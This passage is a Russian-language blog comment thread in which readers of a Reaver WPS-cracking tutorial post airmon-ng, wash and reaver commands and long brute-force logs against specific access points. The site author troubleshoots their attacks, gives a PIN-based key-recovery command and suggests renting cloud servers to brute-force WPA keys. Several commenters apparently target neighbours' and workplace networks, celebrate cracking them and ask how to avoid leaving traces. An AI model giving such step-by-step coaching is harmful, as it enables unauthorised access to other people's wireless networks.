        ^[[A14:D6:4D:83:9F:5A 13 -45 1.0 No KONAN
        F0:7D:68:97:BA:F8 13 -31 1.0 No Infagro Ltd.

        и т д. В столбике WPS Locked пишет НО, значит не закрыт. Сигнал от 100% (свой) до 30% (пробовал всех) :О
        у кореша пишет:

        [+] Waiting for beacon from 4E:D6:7D:83:14:5F
        [+] Switching mon0 to channel 5
        [+] Associated with 4E:D6:7D:83:14:5F (ESSID: ongbak)
        [+] Trying pin 01235678
        [+] Sending EAPOL START request
        [+] Received identity request
        [+] Sending identity response
        [+] Received M1 message
        [+] Sending M2 message
        [+] Received M3 message
        [+] Sending M4 message
        [!] WARNING: Receive timeout occurred
        [+] Sending WSC NACK
        [+] Trying pin 11115670
        [+] Sending EAPOL START request
        [+] Received identity request
        [+] Sending identity response
        [!] WARNING: Receive timeout occurred
        [+] Sending WSC NACK
        [!] WPS transaction failed (code: 0x02), re-trying last pin
        [+] Trying pin 11115670
        [+] Sending EAPOL START request
        [+] Received identity request
        [+] Sending identity response
        [+] Received M1 message
        [+] Sending M2 message
        [+] Received M3 message
        [+] Sending M4 message
        [!] WARNING: Receive timeout occurred
        [+] Sending WSC NACK
        [+] Trying pin 22225672
        [+] Sending EAPOL START request
        [+] Received identity request
        [+] Sending identity res

        что это?

        • hub-lex says:

          Дайте больше информации:
          - производитель AP
          - wi-fi клиент который вы используйте

          Попробуйте запустить reaver c оциями “-E -L -T 2″
          В некоторых AP используется плохое железо, оно может на это влиять.

          Если ничего не выйдет, позвоните Skype: hub-lex-21

          • zooz says:

            Аналогичная проблема.. Разгадка найдена?

          • Максим says:

            Нет. Я перепробовал у друзей, при сигнале не менее 90%, на работе в 2х офисах. При чем с разных ноутов. Дописывал кучу ф-й реавера ( Т L S –no-nacks и т д.) но одно и тоже. Подбор идет, но очень медленно, учитывая кучу лишних запросов и негативных ответов. За 24 часа – 7%…

  • DenisN86 says:

    Здравствуйте! Извиняюсь, если что-то упустил. Сделал BackTrack 5 загрузочный на флешке. Все работает и запускается (reaver-1.4 устанавливается при наличии интернета). А если нет интернета, но есть заранее скаченный reaver-1.4, то гуда поместить папку и как установить в BackTrack 5 (какие набрать команды, если можно с примером). Немного непонятно как установить из исходников.

  • DenisN86 says:

    папка с файлами reaver-1.4 лежит на диске С: как теперь установить reaver-1.4

    • hub-lex says:

      1. запускаете BT5
      2. диски, если не ошибаюсь уже должны быть смонтированы. поэтому открываете терминал или запускаете менеджер
      3. находите свой диск С: -> переходите к файлу (можете копировать или запускать от туда, но лучше скопировать в BT5)
      4. компилируйте

      вот примерно как то так. будут вопросы пишите.

  • DenisN86 says:

    Спасибо. извини а что значит компилируйте?

  • ?? says:

    Доброе время суток! Автору действительно великая благодарность =) у меня вопрос следующего характера… Сделал BackTrack 5 загрузочный на сд.
    запустил на машине дошел до выбора мак адреса и номера канала
    airodump-ng-c 1 -w wwwq–bssid xxxxxxxx mon0
    и он пишет такой команды нет. пробовал несколько раз с разными папками одинаково нет такой команды. в чем можнт быть причина ? заранее благодарен.

  • ?? says:

    спасибо! а еще вопрос, папку где сохраняются файлы сам создаешь или выбирать из системных которые уже есть? если сам то где ее помещать ?

  • ?? says:

    airodump-ng -c -w –bssid mon0 этот фаил я сам создаю или он где то есть ? если сам создаю то где его разместить ?

    • hub-lex says:

      То что вы ввели, это команда.
      Если вы говорите про *.cap файл, он создается в той директории, в которой вы работайте.

  • indigo says:

    # sudo wash -i mon0 –scan
    result – [!] Found packet with bad FCS, skipping…

  • indigo says:

    result – [!] Found packet with bad FCS, skipping…

  • indigo says:

    Probuem wash -i mon0 -C -s ))) working

  • ?? says:

    не понимаю в чем проблема … скачал reaver-1.3 архив рабочий. но вот отрывать не хочет выдает такие строки…
    root@root:~# tar xvfz reaver-1.3.tar.gz
    tar: reaver-1.3.tar.gz: Cannot open: No such file or directory
    tar: Error is not recoverable: exiting now
    tar: Child returned status 2
    tar: Exiting with failure status due to previous errors
    root@root:~#
    что делать ?

    • hub-lex says:

      Попробуйте зайти в директорию с помощью файлового менеджера; затем правая кнопка мыши и т.д. там сами разберетесь.
      На всякий вот статья по tar’y => http://www.levinkv.ru/arhivatsiya-v-linux-komanda-tar/
      И зачем вам reaver v1.3 ведь есть v1.4

      • ?? says:

        нашел четвертый поставил тоже самое.. сейчас буду копаться. спасибо.

  • Вера says:

    здравствуйте. подскажите проблему. reaver запустила. но на каком нибудь проценте он застревает. пытается послать только 1 пин (не меняются как вначале). и пишет одно и тоже 10 % готово (79 секунд). как это исправить?? и сразу такой вопрос сохранить процесс можно Ctrl C. но не знаю как возобновить! если набирать команду заново он начнет с нуля.

  • Вера says:

    и подскажите пожалуйста а почему так долго??вот за 5 часов он сделал только 20% уровень сигнала пишет 56%(3 полоски). может стоит попробовать где сигнал выше?на скорость процесса это повлияет??

    • hub-lex says:

      ждите и не выключайте! все сделается…

      • Шуня says:

        Вопрос, ушел с работы – было 40 %, оставил на ночь, процесс сам остановится, или все заново начинать (за 10 часов только 40% – что-то долго)

        • Hub-lex says:

          Ммм…может быть ночью, что то случилось там? Когда вы пришли на работу снова, АР была включена? Т.е. при повторном сканировании она есть?
          Вы так же можете сохранить сессию и пойти домой. Прийти на работу и возобновить работу. Таким образом процесс расшифровки будет под вашим контролем. Т.е. вы заметите, есть что то пойдет не так.

          О том как сохранить сессию, вы можете прочитать в комментарии от Loman в этой статье.

          • Шуня says:

            Сегодня пробовал на другой сети, ушел домой на 92.78%, если сеть пропадет ночью(выключат) а потом появится – процесс продолжится или все заново?Уходя заметил, что номера пин зациклились (повторяются) это нормально? И еще – финал я не проморгаю, когда приду на работу?

          • Hub-lex says:

            На первый вопрос не могу ответить – не проверял такую ситуацию. Сессия все равно останется, так что можно будет начать с останов. момента.
            Это нормально, если пин зацикливается.
            Нет, будет отображена проделанная работа.

  • Вера says:

    Урааа все получилось!!! взламывал очень медленно аж 12 часов!спасибо вашему сайту! все здорово описано и понятно)) ой а вопрос! вот если за окном вай фай но у него не включен wps следовательно reaver не поможет, что тогда делать??с помощью словаря – эт не реально! потому что надо знать длину пароля.

    • hub-lex says:

      Пожалуйста, рад что получилось.
      Если WPS выключен и шифрование WPA/WPA2, тогда можно попробовать по словарю подобрать. Или же воспользоваться арендой сервера, например Amazon, и попытать грубо подобрать там.

      • Вера says:

        по словарю же например пароль GbHj:jR010112 не получиться подобрать! это я думаю не возможно((хотя в программе wifiway есть генератор паролей но когда ставишь всю кириллицу и все цифры то он сгенерировать не может. он проценты выдает например готово 0,6% а потом спустя полчаса выдает ошибку(( и при взломе по словарю именно WAP2 он когда начинает искать пароль, то комп вырубается. не понимаю почему…а надо поискать генераторы паролей программу, а хотя бесполезно(( надо в них указывать длину пароля. с этим не угадать.

  • Роман says:

    Здравствуйте, а не подскажете, как задействовать всю мощь процессора или видюхи? Может быть есть секрет? И как обойтись без обновления?

    • hub-lex says:

      Секрета не знаю, но думаю что для этого надо разгонять железо.
      Но все это не сравниться с арендой сервера на Amazon. Вот там и мощь и скорость))

  • ?? says:

    извиняюсь это наверно глупый вопрос но все же… как Перейти в директорию /src: где ее искать ? есть что почитать а ?

  • АндрейХром says:

    BackTrack 5 R2 = не могу подключится к своей Wi-Fi для закачки reaver. Захожу internet-wicd network manager-выбираю точку доступа-нажимаю properties-выбираю шифрование wep(passphrase) – ввожу пароль 13ти значный код. нажимаю подключить. идёт нормально, останавливается Obdataining IP Address, долго думает, потом выдает ошибку “unable to get ip address” . Точка доступа Dlink. пробоввал вбивать вручную IP 192.168.1.4. Пробовал менять шифрование на WEP HEX Shared/Restricted – пишет Bad Passwords

    • hub-lex says:

      Хм странно…попробуйте подключиться через LAN.
      Кстати говоря, в BackTrack 5 R2 reaver включен в дистрибутив…так что вы делайте лишнее телодвижение.

      • АндрейХром says:

        apt-get update тоже не надо делать? можно сразу к 3 пункту приступать?

        • hub-lex says:

          Да, но для начала проверьте reaver. В теминале введите reaver. Если не выдаст ошибку, значит к 3-му пункту.

        • АндрейХром says:

          [+] Waiting for beacon from 7C:4F:B5:49:7D:03
          [+] Switching mon0 to channel 2
          [+] Switching mon0 to channel 3
          [+] Switching mon0 to channel 4
          [+] Switching mon0 to channel 5
          [+] Switching mon0 to channel 6
          [+] Switching mon0 to channel 7
          [+] Switching mon0 to channel 8
          [+] Switching mon0 to channel 9
          [+] Switching mon0 to channel 10
          [+] Switching mon0 to channel 11
          ——-по порядку———-
          switching mon0 to channel 14

          • АндрейХром says:

            я перечитал в гугле все на эту тему, не чего не понял. Расскажите своими словами, если можно инструкцию

          • hub-lex says:

            Идет переключение каналов, скорее всего вы не вписали номер используемого канала.
            Покажите, какие команды вы вводите, а не только вывод.

          • АндрейХром says:

            iwconfig

            airmon-ng start wlan0

            airodump-ng mon0

            reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv

            только номер точки доступа которую взламываю

          • hub-lex says:

            А wash кто будет использовать? => http://www.levinkv.ru/reaver-vzlom-wi-fi-seti/

          • АндрейХром says:

            после команды
            wash -i mon0
            - не показываются BSSID. WPA2 PSK точка, значит на ней нет WPS ?

          • hub-lex says:

            Правильно.

  • timon says:

    распаковал архив с reaver а установить не получается пишет root@root:~# cd /src
    bash: cd: /src: No such file or directory что делать ?

  • stas says:

    у меня вопрос а вот выше сказано что надо вставить диск и устоновить reaver и чтоб был подключен к инету. но если ты будешь грузиться с диска когда перезагрузишь комп то как можно подключиться к инету если не загружена систем.

  • stas says:

    Хм странно…попробуйте подключиться через LAN.
    Кстати говоря, в BackTrack 5 R2 reaver включен в дистрибутив…так что вы делайте лишнее телодвижение./// если там есть то зачем надо скачевать BT 5 R1 а лучше запихать туда все что нужно и уже грузится с диска. а то я не пойму как все делается и много таких как я лучше по меньше мороки с скачиванием revera и остального.

  • stas says:

    так про live-cd понел теперь вот я скачал rever на жескии диск в диск С:\ теперь мне что нужно делать.

  • timon says:

    BackTrack 5 R2 reaver включен в дистрибутив это точно ????

  • АндрейХром says:

    А есть программа wash для виндовса? или другая для обнаружения именно WPS. Чтобы можно было найти на виндовсе точку с WPS потом уже загрузится с Live-sd и взламывать

  • stas says:

    здраствуйте я попробывал как написано выше все по инструкции все так и зделал.у меня BT 5 R1 и к инету был подключен через WEB но у меня reaver не скачевается. и выдает вот reaver:command not found.
    может лучше скачать BT 5 R2. там говорят что есть уже reaver.что делат подскажите зарание блогодарен.

  • timon says:

    BSSID Channel RSSI WPS Version WPS Locked ESSID
    —————————————————————————————————————
    38:83:45:C8:3D:08 1 -86 1.0 No svita
    C8:3A:35:3F:56:C8 1 -85 1.0 No Tenda_3F56C8
    38:83:45:E8:64:C0 1 -100 1.0 No MERCURY_E864C0
    что означает WPS Locked No ?? начинаю сканировать с помощью рева выдает что то невразумительное

  • timon says:

    [+] Waiting for beacon from B0:48:7A:29:5E:2A
    [+] Switching mon0 to channel 1
    [+] Associated with B0:48:7A:29:5E:2A (ESSID: TP-LINK_295E2A)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 00005678
    [+] Sending EAPOL START request
    [+] Received identity request

    и это продолжается по без остановки…
    набирал команды
    iwconfig
    airmon-ng start wlan0
    airodump-ng mon0
    wash -i mon0
    reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
    и получилось вот это… что сделал не так ?

  • zooz says:

    А что не устраивает, подбор же идет?

  • timon says:

    просто на скриншотах http://www.levinkv.ru/reaver-vzlom-wi-fi-seti/ вот тут.. процесс выглядит иначе.. да и не показывает процент обработки информации… это то и смутило. тоесть так и должно быть ?

    • hub-lex says:

      Я специально так сделал, чтобы не выводилась всякая хрень.
      Да, процесс идет. Так что ждите.

  • rough says:

    Буду признателен за ответ, ситуация следующая, мною была вскрыта точка WPA с помощью reaver после чего был сменен пасс, пин точки мне известен. Можно ли при последующем подборе ключа указать что пин известен и указать его если да, то сократит ли это время подбора ключа? backtrack 5 r2 alfa awus036

    • hub-lex says:

      reaver как раз и делает, что ищет pin-код. Если он вам уже известен, тогда просто вводите команду с pin-кодом и получаете ключ от сети.
      reaver -i mon0 -b xx:xx:xx:xx:xx:xx –pin=XXXX

  • rough says:

    Данная команда выдала ошибку не правильный пин.Тот пин который был найден reaver`ом в прошлый раз не подошел, я думал данный пин который он находит это тот который написан на нижней части AP

  • rough says:

    Спасибо попытаюсь. И еще вопрос как посмотреть не сканирует ли кто нибудь мою сеть, возможно где-то остаются следы.

    • hub-lex says:

      Все следы остаются в логах, если они включены у вас на точке доступа. Также можно воспользоваться например nagios.
      Что есть для Windows систем, понятия не имею. Так как у меня все работает на *nix.

      • zooz says:

        А где бы поподробнее ознокомится с материалом с самозащитой и конспирацией? Еще хотелось бы чуть лучше понимать сам принцип работы того же рива. Такто гуд когда получается, но ща хочется уже чуть больше понимать.

  • stas says:

    у меня вопрос вот я скачал BT 5 R2 мне все по инструкции надо делать или нужно еще что то туда добавить там надпись какую или не надо.

    • hub-lex says:

      Вроде бы ничего больше не надо. Делайте все по инструкции. Если что пишите.

  • stas says:

    скажите пожалуйста какие команды использовать. можно написать все команды шаг за шагом а то я прочитал коменты там говорят про wash и scan команды. напишите пожалуйста все команды которые нужно водить. зарание блогодарен.

    • hub-lex says:

      Делайте все, как написано. Жедательно, чтобы вы понимали то, что вы вводите.
      Плюс сначала прочитайте http://www.levinkv.ru/reaver-vzlom-wi-fi-seti/
      И посмотрите видео в этой статье.
      Сначала разберите материал, поймите его, а уж потом вламывайте.

  • stas says:

    спасибо

  • baron4ik says:

    Спасибо! наконец-то взломал сеть, 4 суток заняла процедура!!!)))

    • hub-lex says:

      Пожалуйста)
      Если вам понравились статьи, тогда подпишитесь на рассылку по E-mail или RSS, чтобы не пропустить выход нового материала.

  • arman4ik says:

    на загрузочной флэшке BT 5 R2
    не могу понять почему при запуске
    reaver -i mon0 -b 00:0B:2B:72:01:11 -vv
    при скане пинов остаются неизменными 1234, и в самом начале перебора уже выполнено 91 % ???

    [+] Sending WSC NACK
    [+] Trying pin 12340019
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [+] 91.01% complete @ 2012-03-16 13:48:37 (2 seconds/pin)
    [+] Trying pin 12340026
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [+] Trying pin 12340033
    [+] Sending EAPOL START request

    • hub-lex says:

      Все нормально, это частая ситуация, когда reaver перебирает один и тот же pin, Т.ч. ждите.

  • arman4ik says:

    забыл написать, доходит до конца 12349989 и начинает его перебирать зациклившись, оставлял часов на 14, ситуация не изменялась, и все таки почему начинает с 91 %, я так и не понял

  • arman4ik says:

    ломал свою точку, с подстановкой первых четырех цифр – ломает, а по другому не получается, не перебирает первые 4 цифры
    пример
    reaver -i mon0 -b 00:0B:2B:72:01:11 -vv –pin=5639

    • hub-lex says:

      skype: hub-lex-21

      • Xozter° says:

        hub-lex, привет, та же проблема(начинает с 93%, доходит до 12349834 и идет одно и то же), и еще вопрос: почему начинает перебор pin с 1234?
        Спасибо за терпение.

        • Hub-lex says:

          1234 одна из частей общего пина – “It has been reported that some models/vendors/ISPs all come configured with a default pin. Common pins are 12345670, 00005678, 01230000, etc. Reaver attempts known default pins first.”

          • Xozter° says:

            Спасибо, понял.

          • Hub-lex says:

            вам всем наверное надо ссылку сразу скидывать или тексты без перевода =DD
            сразу все понятно и вопросов больше нет =DDD

  • www says:

    Уважаемый Hub не подскажите почему BT хорошо работает с флешкой, а с VM не хочет работать. Есть мнение, что VM невидит беспроводную карту.

    root@bt:~# airmon-ng start wlan0

    Found 1 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!

    PID Name
    4369 dhclient3

    Interface Chipset Driver

  • DenisN86 says:

    А можно ли одновременно ломать несколько точек?

  • ?? says:

    скачал BT 5 R2 и по написанному все сделал =)работал около 40 минут…вроде получилось выдал WPS PIN: ’4150хххх .
    [+] WPA PSK:47b12d700d90ххххххххххх .
    что с этим делать ? ввожу как пароль неопознает ни по первому WPS PIN ни по второму WPA PSK… в чем может быть причина ? или ввожу не там ?

  • Leon says:

    Как сохранить сессию, что б продолжить на следующий день?

    • hub-lex says:

      Какой ОС вы пользуйтесь?

      • Leon says:

        BackTrack 5 R2 на USB

        • hub-lex says:

          Сессия reaver’a сохраняется.
          Разделы диска автомонтируются.
          Следовательно создать папку в разделе диска C:\ и складывать сессии туда.

          • major10 says:

            А я пользуюсь BT5R2 на диске DVD. Спасибо, благодаря вашей статье все получается. Дома нет проблем. А вот на работе, оставить комп работать на долго не могу, а потому, хотелось бы заставить ривер писать сесси на винт. Можете расписать эту процедуру по подробнее?

          • hub-lex says:

            Думаю в след. статье это опишу.

  • major10 says:

    Спасибо, а когда ждать7 Или может где-то еще поискать?

    • major10 says:

      В принципе, наверное есть у ривер команда куда сохранять своп. Или, вот надо подумать на счет установки ривер из под бэктрака сразу на винт, тогда она там свопиться и будет. Нет?

      • hub-lex says:

        Мне кажется это не лучший способ =)
        В статье все будет написано, как и что делать.

        p.s.: оформляйте подписку, чтобы следить за выходом новых статей

    • hub-lex says:

      На днях выйдет. Можете поискать в google. Желательно смотреть на зарубежные сайты.

  • www says:

    Уважаемый hub-lex, а какой vm вы пользуетесь. Походу vm не видит вайфай адаптера. Поэтому приходится пользоваться либо livecd или flash. Или посоветуйте как настроить ВМ ?

    • hub-lex says:

      По поводу настройки VM ничего сказать не могу. Я сам, когда дело умею с Wi-Fi пользуюсь Life-USB.

  • maksym says:

    Zdravstvuite hab-lex.U menia takoi vopros.Ia polzuius BT5 R2,psle pervogo shaga,a imenno posleНаконец, BackTrack загружается в командной строке. Когда Вы увидите в строке курсор, введите команду startx и нажмите Enter. Tak vot,u menia vyvodit na stroke ne (root@root:~#) a kakoe-to (root@bt:~#),ia uzhe vtoroi den’,kak ne mogu rozobratsia kak s etoi problemoi.Posledniaia nadezhda na vas.

    • Hub-lex says:

      Вас смущает запись? Или как?
      Если запись, тогда не обращайте на нее внимание. Просто вводите команды, как в статье.

  • maksym says:

    Net menia pri etom vydaet:
    W: some index files filed to download,they have been ignored,or oldones used instead
    Toest` ne daet deistvovat dalshe.Mozhet ia vvel kakuiu to ne tu komandu,ili tipa togo?

  • maksym says:

    Chestno govoria ,ia i sam ne ponial kak eto vyshlo.
    No zato rozobralsia,chto u menia kak ne stranno dlia BT5 R2 Gnome 64 ne ustonavlivaetsia reaver,pri tom chto,on prisuctvuet v nabore.I problema ostaetsia s apt-get update :???:

    • Hub-lex says:

      Если вы, человек который делал, не понимаете что и как произошло. Тогда я уж тем более. Не могу вам помочь, если вы так и будете ходить вокруг да около.
      Приведите примеры команд, которые вы вводили.
      В чем проблема на конкретном шаге. Какие команды вы вводили и т.п.

  • ReisendeR says:

    Такая проблема, когда прописываю команду airmon-ng start wlan1(примерно). то прописывает все что выше, у драйвера(как на картинке) пишет (monitor mode enabled) и все. ни mon0 ни еще каких нет.

    • Hub-lex says:

      Дайте вывод команды lspci

      • ReisendeR says:

        00:00.0 Host bridge: Advanced Micro Devices [AMD] Device 1510
        00:01.0 VGA compatible controller: ATI Technologies Inc Device 9804
        00:01.1 Audio device: ATI Technologies Inc Device 1314
        00:11.0 SATA controller: ATI Technologies Inc SB700/SB800 SATA Controller [AHCI mode]
        00:12.0 USB Controller: ATI Technologies Inc SB700/SB800 USB OHCI0 Controller
        00:12.2 USB Controller: ATI Technologies Inc SB700/SB800 USB EHCI Controller
        00:13.0 USB Controller: ATI Technologies Inc SB700/SB800 USB OHCI0 Controller
        00:13.2 USB Controller: ATI Technologies Inc SB700/SB800 USB EHCI Controller
        00:14.0 SMBus: ATI Technologies Inc SBx00 SMBus Controller (rev 42)
        00:14.2 Audio device: ATI Technologies Inc SBx00 Azalia (Intel HDA) (rev 40)
        00:14.3 ISA bridge: ATI Technologies Inc SB700/SB800 LPC host controller (rev 40)
        00:14.4 PCI bridge: ATI Technologies Inc SBx00 PCI to PCI Bridge (rev 40)
        00:15.0 PCI bridge: ATI Technologies Inc Device 43a0
        00:15.2 PCI bridge: ATI Technologies Inc Device 43a2
        00:15.3 PCI bridge: ATI Technologies Inc Device 43a3
        00:18.0 Host bridge: Advanced Micro Devices [AMD] Device 1700 (rev 43)
        00:18.1 Host bridge: Advanced Micro Devices [AMD] Device 1701
        00:18.2 Host bridge: Advanced Micro Devices [AMD] Device 1702
        00:18.3 Host bridge: Advanced Micro Devices [AMD] Device 1703
        00:18.4 Host bridge: Advanced Micro Devices [AMD] Device 1704
        00:18.5 Host bridge: Advanced Micro Devices [AMD] Device 1718
        00:18.6 Host bridge: Advanced Micro Devices [AMD] Device 1716
        00:18.7 Host bridge: Advanced Micro Devices [AMD] Device 1719
        06:00.0 Ethernet controller: Atheros Communications AR8152 v2.0 Fast Ethernet (rev c1)
        07:00.0 Network controller: Broadcom Corporation Device 4727 (rev 01)

        это нетбук+ вайфай адаптер

  • maksym says:

    Skazhu vam chestno,ia v etom dele kak govoriat chainik,poetomu spasibo za udelennoe vremia i terpenie.
    Doshel do togo gde avtor vvodit komandu apt-get updat.Dal?she mne vydaet.
    W: some index files filed to download,they have been ignored,or old ones used instead.
    Ia dumaiu,chto mozhet che-to ne to sluchaino nazhal.Vrode bol?she nekuda bylo zahodit.

  • timon says:

    что на счет сохранения сессии Reaver??? очень хочется почитать… статья есть или только будет ?
    заранее ОГРОМНОЕ спасибо =)

    • Hub-lex says:

      Статья только будет. Сейчас идет работа над другими статьями, как мне кажется они будут интересными. А статья по Reaver FAQ, которая будет включать сохранение сессии и т.п. будет готова на след. неделе. Так что подписывайся на рассылку, чтобы следить за выходом новых статей.

  • den says:

    у меня вот такая проблема помогите
    [+] Waiting for beacon from 00:0B:2B:42:CC:F1
    [+] Switching mon0 to channel 1
    [+] Associated with 00:0B:2B:42:CC:F1 (ESSID: ACORP)
    Дальше ничего не происходит.

  • kripto75 says:

    Спасибо за статью Hub-lex! У меня есть 4 сети которые можно крякнуть (по wash). Первая поддалась на ура!6 часов -пароль в кармане. А вот другие ведут себя странным образом: одна, пропускает один пароль потом исчезает вообще из сети. дальше идёт сканирование( минуты две-три) опять пропадает и заново её поиск по всем каналам и заново… вторая из канала не исчезает ,а берёт тайм-аут то-же гдето на минуту… скорость за 8 часов : 5%. Сигнал от всех сетей устойчивый и 65%. Посоветуйте что делать, как можно ускориться. А так-же как можно записать сессию reaver на внешний накопитель. если можно то прям покомандно. СПАСИБО! Статья СУПЕР!!!!

    • Hub-lex says:

      Рад что нравится)
      Что говорит wash по поводу других сетей? Покажите вывод.
      По поводу сессии будет позже рассказано в статье Reaver FAQ, которая готовится.

      • kripto75 says:

        root@bt:~# sudo wash -i mon0

        Wash v1.4 WiFi Protected Setup Scan Tool
        Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

        BSSID Channel RSSI WPS Version WPS Locked ESSID
        —————————————————————————————————————
        BC:AE:C5:88:5A:BA 1 -103 1.0 No ASUS
        F0:7D:68:9A:89:C2 4 -90 1.0 No dlink
        84:C9:B2:6E:01:57 5 -95 1.0 No ol_84
        1C:7E:E5:0A:72:7F 6 -94 1.0 No Domolink_Home
        F0:7D:68:95:65:82 11 -95 1.0 No DMITRY-Network

        a vydaet vot chto
        BSSID Channel RSSI WPS Version WPS Locked ESSID
        —————————————————————————————————————
        BC:AE:C5:88:5A:BA 1 -103 1.0 No ASUS
        F0:7D:68:9A:89:C2 4 -90 1.0 No dlink
        84:C9:B2:6E:01:57 5 -95 1.0 No ol_84
        1C:7E:E5:0A:72:7F 6 -94 1.0 No Domolink_Home
        F0:7D:68:95:65:82 11 -95 1.0 No DMITRY-Network
        ^C
        root@bt:~# reaver -i mon0 -b F0:7D:68:95:65:82 -vv

        Reaver v1.4 WiFi Protected Setup Attack Tool
        Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

        [+] Waiting for beacon from F0:7D:68:95:65:82
        [+] Switching mon0 to channel 1
        [+] Switching mon0 to channel 2
        [+] Switching mon0 to channel 3
        [+] Switching mon0 to channel 4
        [+] Switching mon0 to channel 5
        [+] Switching mon0 to channel 6
        [+] Switching mon0 to channel 7
        [+] Switching mon0 to channel 8
        [+] Switching mon0 to channel 9
        [+] Switching mon0 to channel 10
        [+] Switching mon0 to channel 11
        [+] Associated with F0:7D:68:95:65:82 (ESSID: DMITRY-Network)
        [+] Trying pin 12345670
        [+] Sending EAPOL START request
        [+] Received identity request
        [+] Sending identity response
        [!] WARNING: Receive timeout occurred
        [+] Sending WSC NACK
        [!] WPS transaction failed (code: 0×02), re-trying last pin
        [+] Trying pin 12345670
        [+] Sending EAPOL START request
        [!] WARNING: Receive timeout occurred
        [+] Sending EAPOL START request
        [!] WARNING: Receive timeout occurred
        [+] Sending EAPOL START request
        [+] Received identity request
        [+] Sending identity response
        [!] WARNING: Receive timeout occurred
        [+] Sending WSC NACK
        [!] WPS transaction failed (code: 0×02), re-trying last pin
        [+] Trying pin 12345670
        [+] Sending EAPOL START request
        [!] WARNING: Receive timeout occurred
        [+] Sending EAPOL START request
        [!] WARNING: Receive timeout occurred
        [+] Received M1 message
        [+] Sending WSC NACK
        [+] Sending WSC NACK
        [!] WPS transaction failed (code: 0×03), re-trying last pin
        [+] Trying pin 12345670
        [+] Sending EAPOL START request
        [+] Received identity request
        [+] Sending identity response
        [!] WARNING: Receive timeout occurred
        [+] Sending WSC NACK
        [!] WPS transaction failed (code: 0×02), re-trying last pin
        [+] Trying pin 12345670
        [+] Sending EAPOL START request
        [!] WARNING: Receive timeout occurred
        [+] Sending EAPOL START request
        [!] WARNING: Receive timeout occurred
        [+] Sending EAPOL START request
        [+] Received identity request
        [+] Sending identity response
        [!] WARNING: Receive timeout occurred
        [+] Sending WSC NACK
        [!] WPS transaction failed (code: 0×02), re-trying last pin
        [+] Trying pin 12345670
        [+] Sending EAPOL START request
        [!] WARNING: Receive timeout occurred
        [+] Sending EAPOL START request
        [!] WARNING: Receive timeout occurred
        [+] Sending EAPOL START request
        [!] WARNING: Receive timeout occurred
        [+] Sending EAPOL START request
        [!] WARNING: Receive timeout occurred
        [+] Sending EAPOL START request
        [+] Received identity request
        [+] Sending identity response
        [!] WARNING: Receive timeout occurred
        [+] Sending WSC NACK
        [!] WPS transaction failed (code: 0×02), re-trying last pin
        [+] Nothing done, nothing to save.
        [+] 0.00% complete @ 2012-04-05 07:45:09 (0 seconds/pin)
        [+] Trying pin 12345670
        [+] Switching mon0 to channel 12
        [+] Switching mon0 to channel 13
        [+] Switching mon0 to channel 14
        [+] Switching mon0 to channel 1
        [+] Switching mon0 to channel 2
        [+] Switching mon0 to channel 3
        [+] Switching mon0 to channel 4
        [+] Switching mon0 to channel 5
        [+] Switching mon0 to channel 6
        [+] Switching mon0 to channel 7
        [+] Switching mon0 to channel 8
        [+] Switching mon0 to channel 9
        [+] Switching mon0 to channel 10
        [+] Switching mon0 to channel 11
        [+] Switching mon0 to channel 12
        [+] Switching mon0 to channel 13
        [+] Switching mon0 to channel 14
        [+] Switching mon0 to channel 1
        [+] Switching mon0 to channel 2
        [+] Switching mon0 to channel 3
        [+] Switching mon0 to channel 4
        [+] Switching mon0 to channel 5
        [+] Switching mon0 to channel 6
        [+] Switching mon0 to channel 7
        [+] Switching mon0 to channel 8
        [+] Switching mon0 to channel 9
        [+] Switching mon0 to channel 10
        [+] Switching mon0 to channel 11
        [+] Switching mon0 to channel 12
        [+] Switching mon0 to channel 13
        [+] Switching mon0 to channel 14
        [+] Switching mon0 to channel 1
        [+] Switching mon0 to channel 2
        [+] Switching mon0 to channel 3
        [+] Switching mon0 to channel 4
        [+] Switching mon0 to channel 5
        [+] Switching mon0 to channel 6
        [+] Switching mon0 to channel 7
        [+] Switching mon0 to channel 8
        [+] Switching mon0 to channel 9
        [+] Switching mon0 to channel 10
        [+] Switching mon0 to channel 11
        [+] Switching mon0 to channel 12
        [+] Switching mon0 to channel 13
        [+] Switching mon0 to channel 14
        [+] Switching mon0 to channel 1
        [+] Switching mon0 to channel 2
        [+] Switching mon0 to channel 3
        [+] Switching mon0 to channel 4
        [+] Switching mon0 to channel 5
        [+] Switching mon0 to channel 6
        [+] Switching mon0 to channel 7
        [+] Switching mon0 to channel 8
        [+] Switching mon0 to channel 9
        [+] Switching mon0 to channel 10
        [+] Switching mon0 to channel 11
        [+] Switching mon0 to channel 12
        [+] Switching mon0 to channel 13
        [+] Switching mon0 to channel 14
        [+] Switching mon0 to channel 1
        [+] Switching mon0 to channel 2
        [+] Switching mon0 to channel 3
        [+] Switching mon0 to channel 4
        [+] Switching mon0 to channel 5
        [+] Switching mon0 to channel 6
        [+] Switching mon0 to channel 7
        [+] Switching mon0 to channel 8
        [+] Switching mon0 to channel 9
        [+] Switching mon0 to channel 10
        [+] Switching mon0 to channel 11
        [+] Switching mon0 to channel 12
        [+] Switching mon0 to channel 13
        [+] Switching mon0 to channel 14
        [+] Switching mon0 to channel 1
        [+] Switching mon0 to channel 2
        [+] Switching mon0 to channel 3
        [+] Switching mon0 to channel 4
        [+] Switching mon0 to channel 5
        [+] Switching mon0 to channel 6
        [+] Switching mon0 to channel 7
        [+] Switching mon0 to channel 8
